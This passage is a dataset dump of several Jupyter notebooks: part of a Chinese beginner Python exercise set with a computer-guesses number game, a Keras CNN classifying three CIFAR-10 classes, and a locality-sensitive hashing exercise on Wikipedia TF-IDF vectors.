46\n执行1的结果是: 4.810124939475361\n\n执行2的随机整数是: 49\n执行2的随机整数是: 49\n执行2的结果是: 1.6962756445012634\n" ] ], [ [ "练习 3:写函数,求s=a+aa+aaa+aaaa+aa...a的值,其中a是[1,9]之间的随机整数。例如2+22+222+2222+22222(此时共有5个数相加),几个数相加由键盘输入。", "_____no_output_____" ] ], [ [ "import random\n\ndef test():\n a = random.randint(1,9)\n print('随机整数a是:', a)\n i = 0\n s = 0\n number = 0\n total = 0\n \n \n while i < n:\n s = 10**i\n number += a * s\n total += number\n i += 1\n \n return total\n\n#主程序\nn = int(input('需要相加的个数是:'))\nprint('结果是:', test())", "需要相加的个数是:4\n随机整数a是: 3\n结果是: 3702\n" ] ], [ [ "挑战性练习:仿照task5,将猜数游戏改成由用户随便选择一个整数,让计算机来猜测的猜数游戏,要求和task5中人猜测的方法类似,但是人机角色对换,由人来判断猜测是大、小还是相等,请写出完整的猜数游戏。", "_____no_output_____" ] ], [ [ "import random, math\n\n\ndef win():\n print(\n '''\n ======YOU WIN=======\n \n \n .\"\". .\"\",\n | | / /\n | | / /\n | | / /\n | |/ ;-._ \n } ` _/ / ;\n | /` ) / /\n | / /_/\\_/\\\n |/ / |\n ( ' \\ '- |\n \\ `. /\n | |\n | |\n \n ======YOU WIN=======\n '''\n )\n \ndef lose():\n print(\n '''\n ======YOU LOSE=======\n \n \n \n\n .-\" \"-.\n / \\\n | |\n |, .-. .-. ,|\n | )(__/ \\__)( |\n |/ /\\ \\|\n (@_ (_ ^^ _)\n _ ) \\_______\\__|IIIIII|__/__________________________\n (_)@8@8{}<________|-\\IIIIII/-|___________________________>\n )_/ \\ /\n (@ `--------`\n \n \n \n ======YOU LOSE=======\n '''\n )\n \ndef game_over():\n print(\n '''\n ======GAME OVER=======\n \n _________ \n / ======= \\ \n / __________\\ \n | ___________ | \n | | - | | \n | | | | \n | |_________| |________________ \n \\=____________/ ) \n / \"\"\"\"\"\"\"\"\"\"\" \\ / \n / ::::::::::::: \\ =D-' \n (_________________) \n\n \n ======GAME OVER=======\n '''\n )\n\ndef show_team():\n print('''\n ***声明***\n 本游戏由PXS小机智开发''')\n\ndef show_instruction():\n print('''\n 游戏说明\n玩家选择一个任意整数,计算机来猜测该数。\n若计算机在规定次数内猜中该数,则计算机获胜。\n若规定次数内没有猜中,则玩家获胜。''')\n \ndef menu():\n print('''\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 
制作团队\n =====游戏菜单=====''') \n\ndef guess_game():\n n = int(input('请输入一个大于0的整数,作为神秘整数的上界,回车结束。'))\n max_times = int(math.log(n,2))\n print('规定猜测次数是:', max_times, '次')\n print()\n guess = random.randint(1, n)\n print('我猜这个数是:', guess)\n guess_times = 1\n max_number = n\n min_number = 1\n \n while guess_times < max_times:\n answer = input('我猜对了吗?(请输入“对”或“不对”)')\n if answer == '对':\n print(lose())\n break\n if answer == '不对':\n x = input('我猜大了还是小了?(请输入“大”或“小”)')\n print()\n if x == '大':\n max_number = guess-1\n guess = random.randint(min_number,max_number)\n print('我猜这个数是:', guess)\n guess_times += 1 \n print('我已经猜了', guess_times, '次')\n print()\n if guess_times == max_times:\n ask = input('''***猜测已达规定次数*** \n 我猜对了吗?(请输入“对”或“不对”)''')\n if ask == '不对':\n end()\n break\n else:\n lose()\n if x == '小':\n min_number = guess + 1\n guess = random.randint(min_number,max_number)\n print('我猜这个数是:', guess)\n guess_times += 1\n print('我已经猜了', guess_times, '次')\n print()\n if guess_times == max_times:\n ask = input('''***猜测已达规定次数*** \n 我猜对了吗?(请输入“对”或“不对”)''')\n if ask == '不对':\n end()\n break\n else:\n lose()\n \ndef end():\n a = input('你的神秘数字是:')\n print()\n print('原来是', a, '啊!')\n win()\n\n#主函数\ndef main():\n while True:\n menu()\n choice = int(input('请输入你的选择'))\n if choice == 1:\n show_instruction()\n elif choice == 2:\n guess_game()\n elif choice == 3:\n game_over()\n break\n else:\n show_team()\n\n\n#主程序\nif __name__ == '__main__':\n main()", "\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择1\n\n 游戏说明\n玩家选择一个任意整数,计算机来猜测该数。\n若计算机在规定次数内猜中该数,则计算机获胜。\n若规定次数内没有猜中,则玩家获胜。\n\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择4\n\n ***声明***\n 本游戏由PXS小机智开发\n\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择2\n请输入一个大于0的整数,作为神秘整数的上界,回车结束。9\n规定猜测次数是: 3 次\n\n我猜这个数是: 1\n我猜对了吗?(请输入“对”或“不对”)不对\n我猜大了还是小了?(请输入“大”或“小”)小\n\n我猜这个数是: 2\n我已经猜了 2 次\n\n我猜对了吗?(请输入“对”或“不对”)不对\n我猜大了还是小了?(请输入“大”或“小”)小\n\n我猜这个数是: 9\n我已经猜了 3 次\n\n***猜测已达规定次数*** \n 我猜对了吗?(请输入“对”或“不对”)不对\n你的神秘数字是:8\n\n原来是 8 啊!\n\n ======YOU WIN=======\n \n \n .\"\". .\"\",\n | | / /\n | | / /\n | | / /\n | |/ ;-._ \n } ` _/ / ;\n | /` ) / /\n | / /_/\\_/ |/ / |\n ( ' \\ '- |\n \\ `. /\n | |\n | |\n \n ======YOU WIN=======\n \n\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择3\n\n ======GAME OVER=======\n \n _________ \n / ======= \\ \n / __________\\ \n | ___________ | \n | | - | | \n | | | | \n | |_________| |________________ \n \\=____________/ ) \n / \"\"\"\"\"\"\"\"\"\"\" \\ / \n / ::::::::::::: \\ =D-' \n (_________________) \n\n \n ======GAME OVER=======\n \n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1e2731f3886e4983bf3de09ed66cbdfb6c4557
184,400
ipynb
Jupyter Notebook
CNN_Keras_imageClassfier.ipynb
parthsaxena1909/Image-Classifer-using-CIFRA10
755991301701d2656dbc86a563b55a22eb0a06db
[ "MIT" ]
null
null
null
CNN_Keras_imageClassfier.ipynb
parthsaxena1909/Image-Classifer-using-CIFRA10
755991301701d2656dbc86a563b55a22eb0a06db
[ "MIT" ]
null
null
null
CNN_Keras_imageClassfier.ipynb
parthsaxena1909/Image-Classifer-using-CIFRA10
755991301701d2656dbc86a563b55a22eb0a06db
[ "MIT" ]
null
null
null
421.004566
52,110
0.924398
[ [ [ "<a href=\"https://colab.research.google.com/github/parthsaxena1909/Image-Classifer-using-CIFRA10/blob/master/CNN_Keras_imageClassfier.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nimport os \nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n%matplotlib inline \n\nif not os.path.isdir('models'):\n os.mkdir('models')\n\nprint('Tensorflow Version:', tf.__version__)\nprint('is using GPU?', tf.test.is_gpu_available())\n", "Tensorflow Version: 2.2.0\nWARNING:tensorflow:From <ipython-input-1-22f0592f0b90>:12: is_gpu_available (from tensorflow.python.framework.test_util) is deprecated and will be removed in a future version.\nInstructions for updating:\nUse `tf.config.list_physical_devices('GPU')` instead.\nis using GPU? False\n" ], [ "def get_three_classess(x,y):\n indices_0, _ = np.where(y==0.)\n indices_1, _ = np.where(y==1.)\n indices_2, _ = np.where(y==2.)\n\n indices = np.concatenate([indices_0, indices_1, indices_2], axis = 0)\n\n x = x[indices]\n y = y[indices]\n\n count = x.shape[0]\n indices = np.random.choice(range(count), count , replace = False )\n\n x = x[indices]\n y= y[indices]\n\n y = tf.keras.utils.to_categorical(y)\n\n return x,y \n \n\n", "_____no_output_____" ], [ "(x_train,y_train),(x_test,y_test) = tf.keras.datasets.cifar10.load_data()\nx_train,y_train = get_three_classess(x_train,y_train)\nx_test, y_test = get_three_classess(x_test,y_test)\nprint(x_train.shape,y_train.shape)\nprint(x_test.shape,y_test.shape)\n", "(15000, 32, 32, 3) (15000, 3)\n(3000, 32, 32, 3) (3000, 3)\n" ], [ "class_names = ['aeroplane','car','bird']\ndef show_random_examples(x,y,p):\n indices = np.random.choice(range(x.shape[0]), 10, replace = False)\n\n x=x[indices]\n y=y[indices]\n p=p[indices]\n plt.figure(figsize = (10,5))\n for i in range(10):\n plt.subplot(2,5,1+i)\n plt.imshow(x[i])\n plt.xticks([])\n plt.yticks([])\n col = 'green' if np.argmax(y[i]) == np.argmax(p[i]) else 'red'\n plt.xlabel(class_names[np.argmax(p[i])], color = col)\n plt.show()\nshow_random_examples(x_train,y_train,y_train)\n \n", "_____no_output_____" ], [ "show_random_examples(x_test,y_test,y_test)", "_____no_output_____" ], [ "from tensorflow.keras.layers import Conv2D, MaxPooling2D, BatchNormalization\nfrom tensorflow.keras.layers import Dropout, Flatten, Input,Dense\n\ndef create_model():\n def add_conv_block(model, num_filters):\n model.add(Conv2D(num_filters,3,activation='relu',padding='same'))\n model.add(BatchNormalization())\n model.add(Conv2D(num_filters,3,activation='relu',padding='valid'))\n model.add(MaxPooling2D(pool_size= 2))\n model.add(Dropout(0.5))\n return model\n\n model = tf.keras.models.Sequential()\n model.add(Input(shape=(32,32,3)))\n\n model = add_conv_block(model,32)\n model= add_conv_block(model,64)\n model = add_conv_block(model,128)\n model.add(Flatten())\n model.add(Dense(3,activation='softmax'))\n\n model.compile(\n loss = 'categorical_crossentropy',\n optimizer= 'adam', metrics=['accuracy']\n )\n return model \nmodel = create_model()\nmodel.summary()\n", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 32, 32, 32) 896 \n_________________________________________________________________\nbatch_normalization (BatchNo (None, 32, 32, 32) 128 
\n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 30, 30, 32) 9248 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 15, 15, 32) 0 \n_________________________________________________________________\ndropout (Dropout) (None, 15, 15, 32) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 15, 15, 64) 18496 \n_________________________________________________________________\nbatch_normalization_1 (Batch (None, 15, 15, 64) 256 \n_________________________________________________________________\nconv2d_3 (Conv2D) (None, 13, 13, 64) 36928 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 6, 6, 64) 0 \n_________________________________________________________________\ndropout_1 (Dropout) (None, 6, 6, 64) 0 \n_________________________________________________________________\nconv2d_4 (Conv2D) (None, 6, 6, 128) 73856 \n_________________________________________________________________\nbatch_normalization_2 (Batch (None, 6, 6, 128) 512 \n_________________________________________________________________\nconv2d_5 (Conv2D) (None, 4, 4, 128) 147584 \n_________________________________________________________________\nmax_pooling2d_2 (MaxPooling2 (None, 2, 2, 128) 0 \n_________________________________________________________________\ndropout_2 (Dropout) (None, 2, 2, 128) 0 \n_________________________________________________________________\nflatten (Flatten) (None, 512) 0 \n_________________________________________________________________\ndense (Dense) (None, 3) 1539 \n=================================================================\nTotal params: 289,443\nTrainable params: 288,995\nNon-trainable params: 448\n_________________________________________________________________\n" ], [ "h = model.fit(\n x_train/255.,y_train,\n validation_data=(x_test/255.,y_test),\n epochs=10, batch_size = 128,\n callbacks=[\n tf.keras.callbacks.EarlyStopping(monitor='val_accuracy',patience=3),\n tf.keras.callbacks.ModelCheckpoint(\n 'models/model_{val_accuracy:.3f}.h5',\n save_best_only=True, save_weights_only=False,\n monitor = 'val_accuracy'\n )\n ]\n)", "Epoch 1/10\n118/118 [==============================] - 85s 719ms/step - loss: 0.9064 - accuracy: 0.6742 - val_loss: 3.5118 - val_accuracy: 0.3333\nEpoch 2/10\n118/118 [==============================] - 85s 720ms/step - loss: 0.5638 - accuracy: 0.7707 - val_loss: 3.7951 - val_accuracy: 0.3333\nEpoch 3/10\n118/118 [==============================] - 85s 724ms/step - loss: 0.5050 - accuracy: 0.8001 - val_loss: 2.7839 - val_accuracy: 0.3777\nEpoch 4/10\n118/118 [==============================] - 85s 724ms/step - loss: 0.4514 - accuracy: 0.8190 - val_loss: 2.1426 - val_accuracy: 0.4347\nEpoch 5/10\n118/118 [==============================] - 85s 722ms/step - loss: 0.4194 - accuracy: 0.8333 - val_loss: 1.0153 - val_accuracy: 0.6487\nEpoch 6/10\n118/118 [==============================] - 84s 711ms/step - loss: 0.3790 - accuracy: 0.8480 - val_loss: 0.5955 - val_accuracy: 0.7653\nEpoch 7/10\n118/118 [==============================] - 85s 721ms/step - loss: 0.3519 - accuracy: 0.8635 - val_loss: 0.3499 - val_accuracy: 0.8637\nEpoch 8/10\n118/118 [==============================] - 85s 718ms/step - loss: 0.3308 - accuracy: 0.8715 - val_loss: 0.4008 - val_accuracy: 0.8570\nEpoch 9/10\n118/118 [==============================] - 85s 723ms/step - loss: 0.3151 - accuracy: 0.8777 - val_loss: 
0.4777 - val_accuracy: 0.8183\nEpoch 10/10\n118/118 [==============================] - 85s 720ms/step - loss: 0.2912 - accuracy: 0.8881 - val_loss: 0.2930 - val_accuracy: 0.8770\n" ], [ "accs= h.history['accuracy']\nval_accs= h.history['val_accuracy']\nplt.plot(range(len(accs)),accs,label='Training')\nplt.plot(range(len(accs)),val_accs,label='Validation')\nplt.legend()\nplt.show()\n", "_____no_output_____" ], [ "model=tf.keras.models.load_model('models/model_0.877.h5')\npreds=model.predict(x_test/255.)\nshow_random_examples(x_test,y_test,preds)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e317e75698c5e22d8f4ba94a46c23b6d9f2aa
52,131
ipynb
Jupyter Notebook
Machine_Learning_WashingTon/Clustering & Retrieval/week2 nearest neighbors & LSH implementation/Nearest Neighbors LSH Implementation.ipynb
PerpetualSmile/-Coursera
485bed0f2e9026e1d66db12c158890e305c4db3d
[ "MIT" ]
1
2020-12-26T12:06:37.000Z
2020-12-26T12:06:37.000Z
Machine_Learning_WashingTon/Clustering & Retrieval/week2 nearest neighbors & LSH implementation/Nearest Neighbors LSH Implementation.ipynb
PerpetualSmile/Coursera
485bed0f2e9026e1d66db12c158890e305c4db3d
[ "MIT" ]
null
null
null
Machine_Learning_WashingTon/Clustering & Retrieval/week2 nearest neighbors & LSH implementation/Nearest Neighbors LSH Implementation.ipynb
PerpetualSmile/Coursera
485bed0f2e9026e1d66db12c158890e305c4db3d
[ "MIT" ]
null
null
null
26.638222
139
0.415837
[ [ [ "# Locality Sensitive Hashing", "_____no_output_____" ] ], [ [ "import numpy as np\nimport pandas as pd\nfrom scipy.sparse import csr_matrix\nfrom sklearn.metrics.pairwise import pairwise_distances\nimport time\nfrom copy import copy\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\n'''compute norm of a sparse vector\n Thanks to: Jaiyam Sharma'''\ndef norm(x):\n sum_sq=x.dot(x.T)\n norm=np.sqrt(sum_sq)\n return(norm)", "_____no_output_____" ] ], [ [ "## Load in the Wikipedia dataset", "_____no_output_____" ] ], [ [ "wiki = pd.read_csv('people_wiki.csv')", "_____no_output_____" ], [ "wiki.head()", "_____no_output_____" ] ], [ [ "## Extract TF-IDF matrix", "_____no_output_____" ] ], [ [ "def load_sparse_csr(filename):\n loader = np.load(filename)\n data = loader['data']\n indices = loader['indices']\n indptr = loader['indptr']\n shape = loader['shape']\n return csr_matrix((data, indices, indptr), shape)\n\ncorpus = load_sparse_csr('people_wiki_tf_idf.npz')", "_____no_output_____" ], [ "assert corpus.shape == (59071, 547979)\nprint('Check passed correctly!')", "Check passed correctly!\n" ] ], [ [ "## Train an LSH model", "_____no_output_____" ] ], [ [ "def generate_random_vectors(num_vector, dim):\n return np.random.randn(dim, num_vector)", "_____no_output_____" ], [ "# Generate 3 random vectors of dimension 5, arranged into a single 5 x 3 matrix.\nnp.random.seed(0) # set seed=0 for consistent results\ngenerate_random_vectors(num_vector=3, dim=5)", "_____no_output_____" ], [ "# Generate 16 random vectors of dimension 547979\nnp.random.seed(0)\nrandom_vectors = generate_random_vectors(num_vector=16, dim=547979)\nrandom_vectors.shape", "_____no_output_____" ], [ "doc = corpus[0, :] # vector of tf-idf values for document 0\ndoc.dot(random_vectors[:, 0]) >= 0 # True if positive sign; False if negative sign", "_____no_output_____" ], [ "doc.dot(random_vectors[:, 1]) >= 0 # True if positive sign; False if negative sign", "_____no_output_____" ], [ "doc.dot(random_vectors) >= 0 # should return an array of 16 True/False bits", "_____no_output_____" ], [ "np.array(doc.dot(random_vectors) >= 0, dtype=int) # display index bits in 0/1's", "_____no_output_____" ], [ "corpus[0:2].dot(random_vectors) >= 0 # compute bit indices of first two documents", "_____no_output_____" ], [ "corpus.dot(random_vectors) >= 0 # compute bit indices of ALL documents", "_____no_output_____" ], [ "doc = corpus[0, :] # first document\nindex_bits = (doc.dot(random_vectors) >= 0)\npowers_of_two = (1 << np.arange(15, -1, -1))\nprint(index_bits)\nprint(powers_of_two)\nprint(index_bits.dot(powers_of_two))", "[[ True True False False False True True False True True True False\n False True False True]]\n[32768 16384 8192 4096 2048 1024 512 256 128 64 32 16\n 8 4 2 1]\n[50917]\n" ], [ "index_bits = corpus.dot(random_vectors) >= 0\nindex_bits.dot(powers_of_two)", "_____no_output_____" ], [ "def train_lsh(data, num_vector=16, seed=None):\n \n dim = data.shape[1]\n if seed is not None:\n np.random.seed(seed)\n random_vectors = generate_random_vectors(num_vector, dim)\n \n powers_of_two = 1 << np.arange(num_vector-1, -1, -1)\n \n table = {}\n \n # Partition data points into bins\n bin_index_bits = (data.dot(random_vectors) >= 0)\n \n # Encode bin index bits into integers\n bin_indices = bin_index_bits.dot(powers_of_two)\n \n # Update `table` so that `table[i]` is the list of document ids with bin index equal to i.\n for data_index, bin_index in enumerate(bin_indices):\n if bin_index not in table:\n # If no list yet exists for 
this bin, assign the bin an empty list.\n table[bin_index] = list() # YOUR CODE HERE\n # Fetch the list of document ids associated with the bin and add the document id to the end.\n table[bin_index].append(data_index)# YOUR CODE HERE\n\n model = {'data': data,\n 'bin_index_bits': bin_index_bits,\n 'bin_indices': bin_indices,\n 'table': table,\n 'random_vectors': random_vectors,\n 'num_vector': num_vector}\n \n return model", "_____no_output_____" ], [ "model = train_lsh(corpus, num_vector=16, seed=143)\ntable = model['table']\nif 0 in table and table[0] == [39583] and \\\n 143 in table and table[143] == [19693, 28277, 29776, 30399]:\n print('Passed!')\nelse:\n print('Check your code.')", "Passed!\n" ] ], [ [ "## Inspect bins", "_____no_output_____" ] ], [ [ "wiki[wiki['name'] == 'Barack Obama']", "_____no_output_____" ], [ "print(model['bin_indices'][35817])", "50194\n" ], [ "wiki[wiki['name'] == 'Joe Biden']", "_____no_output_____" ], [ "print(np.array(model['bin_index_bits'][24478], dtype=int)) # list of 0/1's\nprint(model['bin_indices'][24478]) # integer format\nsum(model['bin_index_bits'][24478] == model['bin_index_bits'][35817])", "[1 0 0 0 0 1 0 0 0 0 0 0 0 0 1 0]\n33794\n" ], [ "wiki[wiki['name']=='Wynn Normington Hugh-Jones']", "_____no_output_____" ], [ "print(np.array(model['bin_index_bits'][22745], dtype=int)) # list of 0/1's\nprint(model['bin_indices'][22745])# integer format\nmodel['bin_index_bits'][35817] == model['bin_index_bits'][22745]", "[0 0 0 1 0 0 1 0 0 0 1 1 0 1 0 0]\n4660\n" ], [ "model['table'][model['bin_indices'][35817]]", "_____no_output_____" ], [ "\ndoc_ids = list(model['table'][model['bin_indices'][35817]])\ndoc_ids.remove(35817) # display documents other than Obama\n\ndocs = wiki[wiki.index.isin(doc_ids)]\ndocs", "_____no_output_____" ], [ "def cosine_distance(x, y):\n xy = x.dot(y.T)\n dist = xy/(norm(x)*norm(y))\n return 1-dist[0,0]\n\nobama_tf_idf = corpus[35817,:]\nbiden_tf_idf = corpus[24478,:]\n\nprint('================= Cosine distance from Barack Obama')\nprint('Barack Obama - {0:24s}: {1:f}'.format('Joe Biden',\n cosine_distance(obama_tf_idf, biden_tf_idf)))\nfor doc_id in doc_ids:\n doc_tf_idf = corpus[doc_id,:]\n print('Barack Obama - {0:24s}: {1:f}'.format(wiki.iloc[doc_id]['name'],\n cosine_distance(obama_tf_idf, doc_tf_idf)))", "================= Cosine distance from Barack Obama\nBarack Obama - Joe Biden : 0.703139\nBarack Obama - Mark Boulware : 0.950867\nBarack Obama - John Wells (politician) : 0.975966\nBarack Obama - Francis Longstaff : 0.978256\nBarack Obama - Madurai T. 
Srinivasan : 0.993092\n" ] ], [ [ "## Query the LSH model", "_____no_output_____" ] ], [ [ "from itertools import combinations", "_____no_output_____" ], [ "num_vector = 16\nsearch_radius = 3\nfor diff in combinations(range(num_vector), search_radius):\n print(diff)", "(0, 1, 2)\n(0, 1, 3)\n(0, 1, 4)\n(0, 1, 5)\n(0, 1, 6)\n(0, 1, 7)\n(0, 1, 8)\n(0, 1, 9)\n(0, 1, 10)\n(0, 1, 11)\n(0, 1, 12)\n(0, 1, 13)\n(0, 1, 14)\n(0, 1, 15)\n(0, 2, 3)\n(0, 2, 4)\n(0, 2, 5)\n(0, 2, 6)\n(0, 2, 7)\n(0, 2, 8)\n(0, 2, 9)\n(0, 2, 10)\n(0, 2, 11)\n(0, 2, 12)\n(0, 2, 13)\n(0, 2, 14)\n(0, 2, 15)\n(0, 3, 4)\n(0, 3, 5)\n(0, 3, 6)\n(0, 3, 7)\n(0, 3, 8)\n(0, 3, 9)\n(0, 3, 10)\n(0, 3, 11)\n(0, 3, 12)\n(0, 3, 13)\n(0, 3, 14)\n(0, 3, 15)\n(0, 4, 5)\n(0, 4, 6)\n(0, 4, 7)\n(0, 4, 8)\n(0, 4, 9)\n(0, 4, 10)\n(0, 4, 11)\n(0, 4, 12)\n(0, 4, 13)\n(0, 4, 14)\n(0, 4, 15)\n(0, 5, 6)\n(0, 5, 7)\n(0, 5, 8)\n(0, 5, 9)\n(0, 5, 10)\n(0, 5, 11)\n(0, 5, 12)\n(0, 5, 13)\n(0, 5, 14)\n(0, 5, 15)\n(0, 6, 7)\n(0, 6, 8)\n(0, 6, 9)\n(0, 6, 10)\n(0, 6, 11)\n(0, 6, 12)\n(0, 6, 13)\n(0, 6, 14)\n(0, 6, 15)\n(0, 7, 8)\n(0, 7, 9)\n(0, 7, 10)\n(0, 7, 11)\n(0, 7, 12)\n(0, 7, 13)\n(0, 7, 14)\n(0, 7, 15)\n(0, 8, 9)\n(0, 8, 10)\n(0, 8, 11)\n(0, 8, 12)\n(0, 8, 13)\n(0, 8, 14)\n(0, 8, 15)\n(0, 9, 10)\n(0, 9, 11)\n(0, 9, 12)\n(0, 9, 13)\n(0, 9, 14)\n(0, 9, 15)\n(0, 10, 11)\n(0, 10, 12)\n(0, 10, 13)\n(0, 10, 14)\n(0, 10, 15)\n(0, 11, 12)\n(0, 11, 13)\n(0, 11, 14)\n(0, 11, 15)\n(0, 12, 13)\n(0, 12, 14)\n(0, 12, 15)\n(0, 13, 14)\n(0, 13, 15)\n(0, 14, 15)\n(1, 2, 3)\n(1, 2, 4)\n(1, 2, 5)\n(1, 2, 6)\n(1, 2, 7)\n(1, 2, 8)\n(1, 2, 9)\n(1, 2, 10)\n(1, 2, 11)\n(1, 2, 12)\n(1, 2, 13)\n(1, 2, 14)\n(1, 2, 15)\n(1, 3, 4)\n(1, 3, 5)\n(1, 3, 6)\n(1, 3, 7)\n(1, 3, 8)\n(1, 3, 9)\n(1, 3, 10)\n(1, 3, 11)\n(1, 3, 12)\n(1, 3, 13)\n(1, 3, 14)\n(1, 3, 15)\n(1, 4, 5)\n(1, 4, 6)\n(1, 4, 7)\n(1, 4, 8)\n(1, 4, 9)\n(1, 4, 10)\n(1, 4, 11)\n(1, 4, 12)\n(1, 4, 13)\n(1, 4, 14)\n(1, 4, 15)\n(1, 5, 6)\n(1, 5, 7)\n(1, 5, 8)\n(1, 5, 9)\n(1, 5, 10)\n(1, 5, 11)\n(1, 5, 12)\n(1, 5, 13)\n(1, 5, 14)\n(1, 5, 15)\n(1, 6, 7)\n(1, 6, 8)\n(1, 6, 9)\n(1, 6, 10)\n(1, 6, 11)\n(1, 6, 12)\n(1, 6, 13)\n(1, 6, 14)\n(1, 6, 15)\n(1, 7, 8)\n(1, 7, 9)\n(1, 7, 10)\n(1, 7, 11)\n(1, 7, 12)\n(1, 7, 13)\n(1, 7, 14)\n(1, 7, 15)\n(1, 8, 9)\n(1, 8, 10)\n(1, 8, 11)\n(1, 8, 12)\n(1, 8, 13)\n(1, 8, 14)\n(1, 8, 15)\n(1, 9, 10)\n(1, 9, 11)\n(1, 9, 12)\n(1, 9, 13)\n(1, 9, 14)\n(1, 9, 15)\n(1, 10, 11)\n(1, 10, 12)\n(1, 10, 13)\n(1, 10, 14)\n(1, 10, 15)\n(1, 11, 12)\n(1, 11, 13)\n(1, 11, 14)\n(1, 11, 15)\n(1, 12, 13)\n(1, 12, 14)\n(1, 12, 15)\n(1, 13, 14)\n(1, 13, 15)\n(1, 14, 15)\n(2, 3, 4)\n(2, 3, 5)\n(2, 3, 6)\n(2, 3, 7)\n(2, 3, 8)\n(2, 3, 9)\n(2, 3, 10)\n(2, 3, 11)\n(2, 3, 12)\n(2, 3, 13)\n(2, 3, 14)\n(2, 3, 15)\n(2, 4, 5)\n(2, 4, 6)\n(2, 4, 7)\n(2, 4, 8)\n(2, 4, 9)\n(2, 4, 10)\n(2, 4, 11)\n(2, 4, 12)\n(2, 4, 13)\n(2, 4, 14)\n(2, 4, 15)\n(2, 5, 6)\n(2, 5, 7)\n(2, 5, 8)\n(2, 5, 9)\n(2, 5, 10)\n(2, 5, 11)\n(2, 5, 12)\n(2, 5, 13)\n(2, 5, 14)\n(2, 5, 15)\n(2, 6, 7)\n(2, 6, 8)\n(2, 6, 9)\n(2, 6, 10)\n(2, 6, 11)\n(2, 6, 12)\n(2, 6, 13)\n(2, 6, 14)\n(2, 6, 15)\n(2, 7, 8)\n(2, 7, 9)\n(2, 7, 10)\n(2, 7, 11)\n(2, 7, 12)\n(2, 7, 13)\n(2, 7, 14)\n(2, 7, 15)\n(2, 8, 9)\n(2, 8, 10)\n(2, 8, 11)\n(2, 8, 12)\n(2, 8, 13)\n(2, 8, 14)\n(2, 8, 15)\n(2, 9, 10)\n(2, 9, 11)\n(2, 9, 12)\n(2, 9, 13)\n(2, 9, 14)\n(2, 9, 15)\n(2, 10, 11)\n(2, 10, 12)\n(2, 10, 13)\n(2, 10, 14)\n(2, 10, 15)\n(2, 11, 12)\n(2, 11, 13)\n(2, 11, 14)\n(2, 11, 15)\n(2, 12, 13)\n(2, 12, 14)\n(2, 12, 15)\n(2, 13, 14)\n(2, 13, 15)\n(2, 14, 15)\n(3, 4, 5)\n(3, 4, 6)\n(3, 4, 7)\n(3, 
4, 8)\n(3, 4, 9)\n(3, 4, 10)\n(3, 4, 11)\n(3, 4, 12)\n(3, 4, 13)\n(3, 4, 14)\n(3, 4, 15)\n(3, 5, 6)\n(3, 5, 7)\n(3, 5, 8)\n(3, 5, 9)\n(3, 5, 10)\n(3, 5, 11)\n(3, 5, 12)\n(3, 5, 13)\n(3, 5, 14)\n(3, 5, 15)\n(3, 6, 7)\n(3, 6, 8)\n(3, 6, 9)\n(3, 6, 10)\n(3, 6, 11)\n(3, 6, 12)\n(3, 6, 13)\n(3, 6, 14)\n(3, 6, 15)\n(3, 7, 8)\n(3, 7, 9)\n(3, 7, 10)\n(3, 7, 11)\n(3, 7, 12)\n(3, 7, 13)\n(3, 7, 14)\n(3, 7, 15)\n(3, 8, 9)\n(3, 8, 10)\n(3, 8, 11)\n(3, 8, 12)\n(3, 8, 13)\n(3, 8, 14)\n(3, 8, 15)\n(3, 9, 10)\n(3, 9, 11)\n(3, 9, 12)\n(3, 9, 13)\n(3, 9, 14)\n(3, 9, 15)\n(3, 10, 11)\n(3, 10, 12)\n(3, 10, 13)\n(3, 10, 14)\n(3, 10, 15)\n(3, 11, 12)\n(3, 11, 13)\n(3, 11, 14)\n(3, 11, 15)\n(3, 12, 13)\n(3, 12, 14)\n(3, 12, 15)\n(3, 13, 14)\n(3, 13, 15)\n(3, 14, 15)\n(4, 5, 6)\n(4, 5, 7)\n(4, 5, 8)\n(4, 5, 9)\n(4, 5, 10)\n(4, 5, 11)\n(4, 5, 12)\n(4, 5, 13)\n(4, 5, 14)\n(4, 5, 15)\n(4, 6, 7)\n(4, 6, 8)\n(4, 6, 9)\n(4, 6, 10)\n(4, 6, 11)\n(4, 6, 12)\n(4, 6, 13)\n(4, 6, 14)\n(4, 6, 15)\n(4, 7, 8)\n(4, 7, 9)\n(4, 7, 10)\n(4, 7, 11)\n(4, 7, 12)\n(4, 7, 13)\n(4, 7, 14)\n(4, 7, 15)\n(4, 8, 9)\n(4, 8, 10)\n(4, 8, 11)\n(4, 8, 12)\n(4, 8, 13)\n(4, 8, 14)\n(4, 8, 15)\n(4, 9, 10)\n(4, 9, 11)\n(4, 9, 12)\n(4, 9, 13)\n(4, 9, 14)\n(4, 9, 15)\n(4, 10, 11)\n(4, 10, 12)\n(4, 10, 13)\n(4, 10, 14)\n(4, 10, 15)\n(4, 11, 12)\n(4, 11, 13)\n(4, 11, 14)\n(4, 11, 15)\n(4, 12, 13)\n(4, 12, 14)\n(4, 12, 15)\n(4, 13, 14)\n(4, 